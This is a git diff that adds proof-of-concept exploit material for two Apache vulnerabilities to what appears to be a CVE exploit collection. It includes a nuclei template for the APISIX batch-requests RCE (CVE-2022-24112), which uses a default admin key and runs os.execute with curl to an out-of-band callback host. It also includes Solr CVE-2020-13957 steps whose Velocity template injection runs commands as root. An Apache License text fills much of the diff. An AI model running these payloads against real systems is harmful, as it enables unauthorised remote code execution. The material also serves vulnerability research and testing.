diff --git a/cve/apache-APISIX/CVE-2022-24112/.keep b/cve/apache-APISIX/CVE-2022-24112/.keep new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/apache-APISIX/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112/CVE-2022-24112.py similarity index 100% rename from cve/apache-APISIX/CVE-2022-24112.py rename to cve/apache-APISIX/CVE-2022-24112/CVE-2022-24112.py diff --git a/cve/apache-APISIX/yaml/.keep b/cve/apache-APISIX/yaml/.keep new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/apache-APISIX/yaml/CVE-2022-24112.yaml b/cve/apache-APISIX/yaml/CVE-2022-24112.yaml new file mode 100644 index 0000000000000000000000000000000000000000..a2d9ab835a9ce70677939c9be199d5a2759cae9d --- /dev/null +++ b/cve/apache-APISIX/yaml/CVE-2022-24112.yaml @@ -0,0 +1,54 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX apisix/batch-requests RCE + description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + author: Mr-xn + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + + tags: cve,cve2022,apache,rce,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + +requests: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Host}}:9080 + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + {"headers":{"X-Real-IP":"127.0.0.1","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/test\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end\"}"}]} + - | + GET /api/test HTTP/1.1 + Host: {{Host}}:9080 + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + Connection: close + + redirects: false + + matchers-condition: and + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200" + # - "status_code_2 == 404" + - 'contains(body_1, "{{randstr}}")' + # - 'contains(body_1, "\"status\":200,\"reason\":\"OK\"}")' + condition: and + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/cve/apache-APISIX/yaml/LICENSE b/cve/apache-APISIX/yaml/LICENSE new file mode 100644 index 0000000000000000000000000000000000000000..261eeb9e9f8b2b4b0d119366dda99c6fd7d35c64 --- /dev/null +++ b/cve/apache-APISIX/yaml/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. + + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/cve/apache-APISIX/yaml/README.md b/cve/apache-APISIX/yaml/README.md new file mode 100644 index 0000000000000000000000000000000000000000..db0a56453d2449229124b69a80846ba60e8b9f4b --- /dev/null +++ b/cve/apache-APISIX/yaml/README.md @@ -0,0 +1,22 @@ +# CVE-2022-24112 +CVE-2022-24112:Apache APISIX apisix/batch-requests RCE + +nuclei template :[CVE-2022-24112.yaml](./CVE-2022-24112.yaml) + +shotpic_2022-02-22_23-36-38 + +这个漏洞本质利用和 [CVE-2021-45232](https://xz.aliyun.com/t/10738) 类似,都是绕过授权或未授权,来执行恶意的 route 里的 filter_func 或者 script 来执行命令 + +## 注意是事项 + +- `X-Real-IP` 的值可以是 `127.0.0.1`,`localhost` 或者 `2130706433` +- `pipeline` 是必须项,以下为其 body 部分的值说明 +- `method` 固定为 `PUT` +- `uri` 必须存在,这也是 exp 后需要访问来触发的 URL +- `plugins`,`upstream/upstream_id`,`service_id` 这三个必须存在其中一个,详情可以参考官方文档 + +如果 service_id 不可用 可以替换成 `\"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}` + +参考: +- https://twitter.com/sirifu4k1/status/1496043663704858625 +- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests diff --git a/cve/apache/CVE-2020-13957/.keep b/cve/apache/CVE-2020-13957/.keep new file mode 100644 index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391 diff --git a/cve/apache/CVE-2020-13957/Dockerfile b/cve/apache/CVE-2020-13957/Dockerfile new file mode 100644 index 0000000000000000000000000000000000000000..06a8d2084700dbd0b1788d3b51bb34ac8d41e921 --- /dev/null +++ b/cve/apache/CVE-2020-13957/Dockerfile @@ -0,0 +1,14 @@ +FROM openjdk:11.0.9.1-jre-buster + +RUN apt update && apt install -y lsof + +ARG SOLR_VER=8.2.0 +ENV PATH $PATH:/usr/local/src/solr-${SOLR_VER}/bin + +WORKDIR /usr/local/src +RUN curl -OL https://archive.apache.org/dist/lucene/solr/${SOLR_VER}/solr-${SOLR_VER}.tgz +RUN tar -xzvf solr-${SOLR_VER}.tgz + +RUN apt update && apt install -y procps + +WORKDIR /usr/local/src/solr-${SOLR_VER}/bin diff --git a/cve/apache/CVE-2020-13957/README.md b/cve/apache/CVE-2020-13957/README.md new file mode 100644 index 0000000000000000000000000000000000000000..a691def72f6bfbea8b4328034214a4562b843791 --- /dev/null +++ b/cve/apache/CVE-2020-13957/README.md @@ -0,0 +1,119 @@ +# Apache Solr RCE CVE-2020-13957 + +**Docker Demo** + +![docker-demo](https://user-images.githubusercontent.com/56715563/100495824-8cabfd00-3192-11eb-9874-960e3c0839fb.gif) + +**Mac Demo** + +![mac-demo](https://user-images.githubusercontent.com/56715563/100495858-d3015c00-3192-11eb-8813-46f94fa4f9c4.gif) + +## NVD CVE-2020-13957 Description + +NVD [CVE-2020-13957](https://nvd.nist.gov/vuln/detail/CVE-2020-13957) + +``` +Apache Solr versions 6.6.0 to 6.6.6, 7.0.0 to 7.7.3 and 8.0.0 to 8.6.2 prevents some features considered dangerous (which could be used for remote code execution) to be configured in a ConfigSet that's uploaded via API without authentication/authorization. The checks in place to prevent such features can be circumvented by using a combination of UPLOAD/CREATE actions. +``` + +## Docker + +### Set up PoC environment + +**1. Build an image from a Dockerfile** + +``` +$ docker build -t cve-2020-13957 . +``` + +**2. Run /bin/bash in a new container** + +``` +$ docker run --rm -p 8983:8983 --name cve-2020-13957 -it cve-2020-13957 /bin/bash +``` + +**3. Start Apache Solr Cloud in the container** + +``` +$ ./solr start -e cloud -noprompt -force +``` + +### Exploit + +**1. Upload a ConfigSet** + +Apache Solr Guide [Upload a ConfigSet](https://lucene.apache.org/solr/guide/8_2/configsets-api.html#configsets-api) + +``` +$ curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet" +``` + +**2. Create a Collection** + +Apache Solr Guide [Create a Collection](https://lucene.apache.org/solr/guide/8_2/collection-management.html#create) + +``` +$ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet" +``` + +**3. Exec Id Command** + +``` +$ curl "http://localhost:8983/solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27id%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end" +``` + +**Output** + +``` + 0 uid=0(root) gid=0(root) groups=0(root) +``` + +## Mac + +### Set up PoC environment + +**1. Download Apache Solr** + +``` +$ curl -OL https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz +``` + +**2. Unzip** + +``` +$ tar -xzvf solr-8.2.0.tgz +``` + +**3. Start Apache Solr Cloud** + +``` +$ solr-8.2.0/bin/solr start -e cloud -noprompt -force +``` + +### Exploit + +**1. Upload a ConfigSet** + +Apache Solr Guide [Upload a ConfigSet](https://lucene.apache.org/solr/guide/8_2/configsets-api.html#configsets-api) + +``` +$ curl -X POST --header "Content-Type:application/octet-stream" --data-binary @myconfigset.zip "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=myConfigSet" +``` + +**2. Create a Collection** + +Apache Solr Guide [Create a Collection](https://lucene.apache.org/solr/guide/8_2/collection-management.html#create) + +``` +$ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=newCollection&numShards=2&replicationFactor=1&wt=xml&collection.configName=myConfigSet" +``` + +**3. Open Calc** + +``` +$ curl "http://localhost:8983/solr/newCollection/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set(%24x%3d%27%27)+%23set(%24rt%3d%24x.class.forName(%27java.lang.Runtime%27))+%23set(%24chr%3d%24x.class.forName(%27java.lang.Character%27))+%23set(%24str%3d%24x.class.forName(%27java.lang.String%27))+%23set(%24ex%3d%24rt.getRuntime().exec(%27open+-a+calculator%27))+%24ex.waitFor()+%23set(%24out%3d%24ex.getInputStream())+%23foreach(%24i+in+%5b1..%24out.available()%5d)%24str.valueOf(%24chr.toChars(%24out.read()))%23end" +``` + +## References + +- https://github.com/Imanfeng/Apache-Solr-RCE#cve-2020-13957 diff --git a/cve/apache/CVE-2020-13957/myconfigset.zip b/cve/apache/CVE-2020-13957/myconfigset.zip new file mode 100644 index 0000000000000000000000000000000000000000..ae8c7301a188fb00f7c48f8ebc8f85c3cfd809fc Binary files /dev/null and b/cve/apache/CVE-2020-13957/myconfigset.zip differ